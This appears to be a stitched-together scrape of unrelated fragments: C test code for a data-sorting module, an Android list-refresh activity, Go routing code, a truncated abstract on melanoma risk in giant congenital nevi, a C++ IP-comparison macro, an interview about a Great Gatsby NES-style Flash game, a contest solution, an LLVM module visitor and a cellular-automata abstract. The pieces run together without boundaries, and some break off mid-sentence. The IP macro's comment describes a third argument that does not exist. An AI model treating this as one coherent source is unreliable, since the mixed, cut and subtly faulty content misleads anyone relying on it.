assert(dataPtr->records[numVar * s + v] == 1); } if (s > 0) { assert(dataPtr->records[numVar * (s - 1) + v] == 0); } assert(s == numRecord); } memset(dataPtr->records, 1, dataPtr->numVar * dataPtr->numRecord); for (v = 0; v < numVar; v++) { data_sort(dataPtr, 0, numRecord, v); long s = data_findSplit(dataPtr, 0, numRecord, v); if (s < numRecord) { assert(dataPtr->records[numVar * s + v] == 1); } if (s > 0) { assert(dataPtr->records[numVar * (s - 1) + v] == 0); } assert(s == 0); } data_free(dataPtr); } static void testBasic (long numVar, long numRecord, long numMaxParent, long percentParent) { random_t* randomPtr = random_alloc(); puts("Starting..."); data_t* dataPtr = data_alloc(numVar, numRecord, randomPtr); assert(dataPtr); puts("Init:"); data_generate(dataPtr, 0, numMaxParent, percentParent); long v; for (v = 0; v < numVar; v++) { data_sort(dataPtr, 0, numRecord, v); long s = data_findSplit(dataPtr, 0, numRecord, v); if (s < numRecord) { assert(dataPtr->records[numVar * s + v] == 1); } if (s > 0) { assert(dataPtr->records[numVar * (s - 1) + v] == 0); } } memset(dataPtr->records, 0, dataPtr->numVar * dataPtr->numRecord); for (v = 0; v < numVar; v++) { data_sort(dataPtr, 0, numRecord, v); long s = data_findSplit(dataPtr, 0, numRecord, v); if (s < numRecord) { assert(dataPtr->records[numVar * s + v] == 1); } if (s > 0) { assert(dataPtr->records[numVar * (s - 1) + v] == 0); } assert(s == numRecord); } memset(dataPtr->records, 1, dataPtr->numVar * dataPtr->numRecord); for (v = 0; v < numVar; v++) { data_sort(dataPtr, 0, numRecord, v); long s = data_findSplit(dataPtr, 0, numRecord, v); if (s < numRecord) { assert(dataPtr->records[numVar * s + v] == 1); } if (s > 0) { assert(dataPtr->records[numVar * (s - 1) + v] == 0); } assert(s == 0); } data_free(dataPtr); } int main () { puts("Test 1:"); testAll(10, 20, 10, 10); puts("Test 2:"); testBasic(20, 80, 10, 20); puts("Done"); return 0; } #endif /* TEST_DATA */ /* ============================================================================= * * End of data.c * * ============================================================================= */
package com.example.star.myrefreshtest1; import android.app.Activity; import android.content.Intent; import android.support.v7.app.ActionBarActivity; import android.os.Bundle; import android.util.Log; import android.view.LayoutInflater; import android.view.Menu; import android.view.MenuItem; import android.view.View; import android.view.ViewGroup; import android.widget.ArrayAdapter; import android.widget.ListView; import android.widget.TextView; public class MainActivity2Activity extends Activity implements View.OnClickListener { private static final String TAG = MainActivity.class.getSimpleName(); private RefreshableView refreshableView; private ListView listView; private ArrayAdapter<String> adapter; private static String[] dataList = {"<NAME>", "Abbaye du Mont des Cats", "Abertam", "Abondance", "Ackawi", "Acorn", "Adelost", "Affidelice au Chablis", "Afuega'l Pitu", "Airag", "Airedale", "<NAME>", "<NAME>", "<NAME>", "Abbaye du Mont des Cats", "Abertam", "Abondance", "Ackawi", "Acorn", "Adelost", "Affidelice au Chablis", "Afuega'l Pitu", "Airag", "Airedale", "<NAME>", "<NAME>"}; /** * Called when the activity is first created. */ @Override public void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setContentView(R.layout.activity_main_activity2); //findViewById(R.id.main_tv).setOnClickListener(this); listView = (ListView)findViewById(R.id.ptr_listview); adapter = new ArrayAdapter<String>(this,android.R.layout.simple_list_item_1,dataList); listView.setAdapter(adapter); setListViewHeightBasedOnChildren(listView); refreshableView = (RefreshableView) findViewById(R.id.main_refresh_view); refreshableView.setRefreshableHelper(new RefreshableHelper() { @Override public View onInitRefreshHeaderView() { return LayoutInflater.from(MainActivity2Activity.this).inflate(R.layout.refresh_head, null); } @Override public boolean onInitRefreshHeight(int originRefreshHeight) { refreshableView.setRefreshNormalHeight(refreshableView.getOriginRefreshHeight() / 3); refreshableView.setRefreshingHeight(refreshableView.getOriginRefreshHeight()); refreshableView.setRefreshArrivedStateHeight(refreshableView.getOriginRefreshHeight()); return false; } @Override public void onRefreshStateChanged(View refreshView, int refreshState) { TextView tv = (TextView) refreshView.findViewById(R.id.refresh_head_tv); switch (refreshState) { case RefreshableView.STATE_REFRESH_NORMAL: tv.setText("正常状态"); //tv.setBackgroundColor(0xff); break; case RefreshableView.STATE_REFRESH_NOT_ARRIVED: tv.setText("往下拉可以刷新"); break; case RefreshableView.STATE_REFRESH_ARRIVED: tv.setText("放手可以刷新"); break; case RefreshableView.STATE_REFRESHING: tv.setText("正在刷新"); new Thread( new Runnable() { @Override public void run() { try { Thread.sleep(1000l); runOnUiThread(new Runnable() { @Override public void run() { refreshableView.onCompleteRefresh(); } }); } catch (InterruptedException e) { Log.e(TAG, "_", e); } } } ).start(); break; } } }); } public void setListViewHeightBasedOnChildren(ListView listView) { // 获取ListView对应的Adapter //ListAdapter listAdapter = listView.getAdapter(); if (adapter == null) { return; } int totalHeight = 0; for (int i = 0, len = adapter.getCount(); i < len; i++) { // listAdapter.getCount()返回数据项的数目 View listItem = adapter.getView(i, null, listView); // 计算子项View 的宽高 listItem.measure(0, 0); // 统计所有子项的总高度 totalHeight += listItem.getMeasuredHeight(); } ViewGroup.LayoutParams params = listView.getLayoutParams(); params.height = totalHeight+ (listView.getDividerHeight() * (adapter.getCount() - 1)); // listView.getDividerHeight()获取子项间分隔符占用的高度 // params.height最后得到整个ListView完整显示需要的高度 listView.setLayoutParams(params); } @Override public void onClick(View v) { switch (v.getId()) { // case R.id.main_tv: // Log.d(TAG, "content clicked"); // startActivity(new Intent(this, RefreshableListActivity.class)); // break; } } }
package v1 import ( "github.com/gin-gonic/gin" "github.com/pedroribeiro/users/internal/delivery/api/v1/users" "github.com/pedroribeiro/users/internal/repository" "github.com/pedroribeiro/users/internal/usecase" "gorm.io/gorm" ) func InitRoutes(router *gin.RouterGroup, db *gorm.DB) { userRepo := repository.UserRepo{DB: db} userUsecase := usecase.UserUseCase{ Repo: &userRepo, } userHandler := users.UserHandler{ UserUseCase: &userUsecase, } userHandler.InitRoutes(router) }
Malignant potential of large congenital nevi. THERE IS CLEAR DOCUMENTATION that large congenital nevi (giant pigmented nevus, melanocytic nevus) have a very high risk of becoming melanoma. The incidence of melanoma in congenital large nevi has been reported to be between 2 and 42 percent. The average incidence reported in the literature and in the experience at Stanford Hospital suggest that the incidence projected throughout a normal lifespan is between 10 and 20 percent. Therefore, we recommend that congenital melanocytic nevi be surgically excised and reconstructed by appropriate methods. The risk of developing a melanoma is present at all ages, although 70 percent of melanomas occur before puberty. Furthermore, there appears to be a close relationship between the histologic type of the giant nevus and the risk of malignancy. Giant nevi with a histologic pattern of a junctional nevus, neural nevus or blue nevus seem to have a high risk whereas a histologic pattern of an intradermal nevus has a lower risk. Therefore, screening biopsy specimens of the nevus may be helpful in determining the need for, and timing of, surgical excision. The reason for the high malignant potential is not known, but is probably due to one of two factors. First, the nevus is a hamartoma comprised of melanocyte-like cells derived from the neural crest. It can be postulated that whatever teratogen caused the hamartoma has altered the genetic potential within the cell or is in itself also
//---------------------------------------------------------------------------- // Macro: INET_CMP // // Comparison macro for IP addresses. // // This macro compares two IP addresses in network order by // masking off each pair of octets and doing a subtraction; // the result of the final subtraction is stored in the third argument //---------------------------------------------------------------------------- inline int INET_CMP(DWORD a, DWORD b) { DWORD t; return ((t = ((a & 0x000000ff) - (b & 0x000000ff))) ? t : ((t = ((a & 0x0000ff00) - (b & 0x0000ff00))) ? t : ((t = ((a & 0x00ff0000) - (b & 0x00ff0000))) ? t : ((t = (((a>>8) & 0x00ff0000) - ((b>>8) & 0x00ff0000))))))); }
The noticeably minimalist layout coupled with the sparse text of GreatGatsbyGame.com might stylistically conjure up Hemingway more than Fitzgerald, but it was on that unsuspecting website where The Great Gatsby video game revealed itself to the world. Allegedly, a Nintendo prototype cartridge of the game was said to have been found at a yard sale and purchased for the paltry sum of fifty cents. This game-pak contained an unreleased English localization of a Family Computer title called "Doki Doki Toshokan: Gatsby no Monogatari." To back up the bold claim, a blurry photo was taken of the cart, which showed a plain, white label with the word "GATSBY" and the date "12-6-90" written on the front. Accompanying this photograph was a convincing scan of an old magazine ad showcasing the never-before-seen game as well as a few pages out of the instruction manual. Before you flash those PayPal credit cards and shoot off the automated "Is the game for sale?" inquiries, my dear and anxious Nintendo collectors, the truth of the matter is the "old chaps" behind this site, Charlie Hoey and Pete Smith, are just having a little fun promoting their new Flash game — a game that just so happens to lovingly recreate one of the Great American Novels as if it were a long-lost, eight-bit Nintendo video game. Charlie and Pete were gracious enough to agree to an interview to further explain their ambitious project. What made you guys want to make a game based on The Great Gatsby in the first place, and why draw from the Nintendo Entertainment System for inspiration? Is there any meaning to be inferred from using 25-year-old technology to re-tell a story that's so interested in the cyclical nature of time? Charlie: Well, I think we both loved the aesthetics of old NES games so much, and so much of our childhood is sort of wrapped up in this way of telling stories. It's sort of like a scent memory or something, you know? The aspect ratio and the color pallet and the way sprites move and the glitches, it all comes together and really kinda feels like home, in a way. And I mean, The Great Gatsby is the best book ever, and when Pete and I started brainstorming about it, we came up with the TJ Eckleberg boss fight and it was just like, "Man, we have to do this." Pete: We do both really love old NES games and The Great Gatsby, but there might also have been kind of a gentle satirical thrust there—as the game industry has advanced, it's put a ton of focus on telling elaborate stories, when to me, there are media that are much better at storytelling, where games are really good at atmosphere, creating environments to explore, etc. So part of the joke was just how little sense The Great Gatsby makes as a NES game. Can you go a little bit into the development process? How long had The Great Gatsby been in the works? Charlie: Whew. 9 months to a year I'd say, with a lot of breaks in between. It's my first Flash project, so I had a TON of help from my good friend Dylan Valentine, who was on the project early on and got me up to speed. Then he got busy with real work so I sorta took over and got it done. At its best, the development process was me and Pete sitting at a table for like a whole weekend eating Doritos and drinking Mountain Dew and saying, "huh, what about a Gold Hat powerup?" and then making it happen. Pete: We were amazingly on the same page about so much stuff, and the stuff we disagreed on made for hilarious arguments. We were so committed to honoring both the book and the medium—goals that were often at cross-purposes—so we would argue about, like, whether the green light at the end of Level 4 should sparkle. (me: "no! gatsby is dead, the dream died with him!" charlie: "no NES game would end with a static image that way!" [both storm off] [i came around on that one]) One thing that changed as we went along was that we actually reeled in a lot of our sillier ideas—we kept referring back to the text for details, and the prose is so beautiful that it didn't feel right to, say, have Nick battle a giant clam, which was our original concept for the last level. We kept trying to get more of the character of the book into the game, which is why Nick kind of has the hands-in-pockets slouch of an outside observer, whereas Gatsby stands ramrod straight—or why the background on the beach, as you travel from left to right, echoes one of the last lines of the novel: "And as the moon rose higher the inessential houses began to melt away until gradually I became aware of the old island here that flowered once for Dutch sailors' eyes—a fresh, green breast of the new world." Seeing those eight-bit tapper girls doing the Charleston is like something out of a dream. Could you talk about the making of the jazzy, upbeat soundtrack? Charlie: I'll let Pete speak to this, he did all of that. Pete: I write music for my band, The Aye-Ayes, but I didn't know a ton about '20s jazz. My guess is that a musicologist could point out a lot of musical anachronisms, but I did listen to a bunch of '20s jazz in preparation. The title screen music was inspired by this unbelievably gorgeous Billie Holiday song, "It's Like Reaching for the Moon"; I wrote it to fit the words of "Then Wear The Gold Hat," the poem Fitzgerald wrote for the title page of Gatsby and then attributed to the fictional poet Thomas Parke D'Invilliers. The music for Level 4, Nick's reverie on the beach, was supposed to sound like a Chopin nocturne—I'm not convinced I ever really nailed that. (You can hear a previous attempt at the Level 4 music in the cutscene of Gatsby standing on the cliff after Level 1—Charlie felt it was too upbeat for Level 4, and he was right.) You nailed many elements of the novel, right down to Owl Eyes inspecting a book in Gatsby's library. Was there anything that you would have liked to have included but couldn't for whatever reason? Was there anything that you might have changed? Pete: I never liked those games that had too many gameplay styles mashed in at once, often in service to a story that was totally obscure anyway. They just tended to feel sloppy. I think the car level could've been funny but I'm glad we ended up telling that part of the story via a cutscene instead. I realize it would be impossible to translate Gatsby into a video game without booze. Fitzgerald's own wild lifestyle of attending parties, jumping in fountains, rolling bottles down the streets of New York, and then writing apologetic letters the next day for his behavior was all fueled by spirits. You do know, however, kind of like the Prohibition in the '20s, Nintendo wouldn't ever have allowed a game like this to be released due to its strict gaming policy forbidding alcohol from being shown. And religion? Forget about it, even if God is hidden metaphorically in the optician's eyes advertisement. Charlie: Yeah, I always love the story about Soda Popinski from the original Mike Tyson's Punch-out. You know in the arcade game he was "Vodka Drunkenski"? True story. Pete: I was thinking it would've been funny to mock up another manual page for "items" and label the martini power-up "Soda Pop." I noticed "S. Miyahon" was given a special thanks in the game's credits. This was the name that Shigeru Miyamoto was credited as in The Legend of Zelda. The story goes that Miyamoto named his masterpiece after F. Scott Fitzgerald's wife, Zelda. Are there any other in-game references or easter eggs to look out for? Pete: The "special thanks" section is full of the people who made our favorite NES games ever. And there are a couple secret endings—one that pays tribute to one of the most beautiful passages in the book, and one that... doesn't. Have you ever given any thought into converting the game into an actual working Nintendo cartridge to play on a real Nintendo Entertainment System? Charlie: The original idea, before we decided even we weren't that nerdy, was to make it an actual cartridge, maybe make 10 of them, and just hide them at flea markets and let the world discover them. I mean, if we'd done that, I don't think it would have gotten played as widely, but it would have been like, for the history books good. Ultimately we tried to strike the best compromise we could live with between accuracy and accessibility. Pete: I was still pulling out extra colors as of the night before launch. It still has way more colors in some places than a NES could handle, but we tried to keep it reasonably close—it bugs me when people make 8-bit style games and completely disregard what NES games actually looked like. I know that is almost unbelievably geeky (and also slightly hypocritical, since we weren't absolute purists about it ourselves). From The Great Gatsby Game's site: "For many reasons, some legal, we'd prefer not to profit from this game." Would you care to elaborate? Charlie: Well, The Great Gatsby is actually not public domain in the United States believe it or not, and I don't think it will be for like another decade, even though it already is in Canada and Australia. I think that this falls pretty squarely into the nebulous "fair use" category (according to my friend Molly Kleinman, "it's so transformative it makes my head hurt"). But, beyond that, we never really wanted to make money off it. Just to have this be picked up in the giant hydra of internet culture and catch on is... humbling. Priceless. Pete: I'd be pretty happy if people just donated to the two charities we listed. Kids need books. (And to a lesser extent, games.) [First Book; Child's Play] This game is fast going viral on the Internet. What do you make of the overwhelming response? What do you think attracts so many people to a Nintendo-inspired Great Gatsby game? Charlie: I had no idea if it would get picked up or not, I couldn't eat yesterday I was so nervous, and then it got tweeted by a few big places and traffic just went nuts. And the responses are so warm and positive, and these are like, nerds you know? They're not an easy crowd to please with an NES spin off, and it's been really universally enjoyed and it just feels really great. I'm so glad people like it. Pete: I'm extremely touched and I get really excited when people notice the little things we worked hard to put in out of love for both the book and the genre. Are there any plans to adapt other classic literature in the future? Perhaps a puzzle game based on T.S. Eliot's "The Wasteland?" Or an RPG modeled after Joyce's Ulysses? Charlie: Ha! Yeah we talked about making a "Literary Classics Arcade" at first with 3 games, but I think you sort of have diminishing returns. But again, the code's up, it'd be so cool if other people picked up on it and kept the idea going. I mean, that's what the internet is all about, that's what makes it so beautiful. It's this big content snowball. Or, this is a gamer blog, let's say content katamari. Pete: I think we're pretty much done with this idea—but that said, I think someone could make a hilarious Oregon Trail type game built off of Faulkner's As I Lay Dying, one of my all-time favorites. If people want to pick up the ball and run with it, I'd also love to see this game as an actual NES rom—though, again, you'd probably have to scale the graphics back considerably in some places. When you aren't making fantastic Fitzgerald Flash games, what do you guys do for a living? Charlie: I'm a developer at The Barbarian Group in San Francisco. Just moved out here from Philly in November. Pete: I'm an editor at Nerve.com, a website about sex, relationships, and pop culture that everyone should read. Anything else you'd like to add? Charlie: Just thank you internet. It's really an honor to have so many people enjoying something you made. Pete: Thanks, everyone! One can only hope that, if it isn't Charlie or Pete, somebody else returns to that blessed yard sale sometime soon and digs even deeper to unearth more digitized literary treasure. Until then, we play on, beating our high scores, borne back ceaselessly into gaming's past. -Mike
#include <bits/stdc++.h> #define maxn 501 #define mod 1000009 #define infinite 100000000 #define FOR(i, j, k, in) for (int i = j; i < k; i += in) #define REP(i, j) FOR(i, 0, j, 1) using namespace std; typedef unsigned long long int ull; typedef long long int ll; typedef double db; typedef long double ldb; typedef pair<int, int> ii; typedef pair <ll, int> li; typedef pair <db, db> dd; typedef vector<int> vi; typedef vector< vector<int> > vvi; typedef vector<pair<int, int>> vii; #define mp make_pair #define Fi first #define Se second #define pb(x) push_back(x) #define szz(x) ((int)(x).size()) #define all(x) (x).begin(), (x).end() int main(){ ll n, cost; cin >> n; vector<ll> cei(n, 0), sumi(n, 0); REP(i, n){ cin >> cei[i] >> sumi[i]; } REP(i, n){ cost = 0; int secciones; if(sumi[i]<=cei[i]) cout << sumi[i] << endl; else{ secciones = sumi[i] / cei[i]; if(sumi[i]%cei[i]==0){ cout << (secciones*secciones)*cei[i] << endl; } else{ int resto = sumi[i]%cei[i]; REP(j, resto){ cost += (secciones+1)*(secciones+1); } REP(j, cei[i]-resto){ cost += secciones*secciones; } cout << cost << endl; } } } }
/// \brief Perform a depth-first visit of the current module. static bool visitDepthFirst(ModuleFile &M, bool (*Visitor)(ModuleFile &M, bool Preorder, void *UserData), void *UserData, llvm::SmallPtrSet<ModuleFile *, 4> &Visited) { if (Visitor(M, true, UserData)) return true; for (llvm::SetVector<ModuleFile *>::iterator IM = M.Imports.begin(), IMEnd = M.Imports.end(); IM != IMEnd; ++IM) { if (!Visited.insert(*IM)) continue; if (visitDepthFirst(**IM, Visitor, UserData, Visited)) return true; } return Visitor(M, false, UserData); }
Expansive invertible onesided cellular automata We study expansive invertible onesided cellular automata (i.e., expansive automorphisms of onesided full shifts) and find severe dynamical and arithmetic constraints which provide partial answers to questions raised by M. Nasu . We employ the images and bilateral dimension groups, measure multipliers, and constructive combinatorial characterizations for two classes of cellular automata.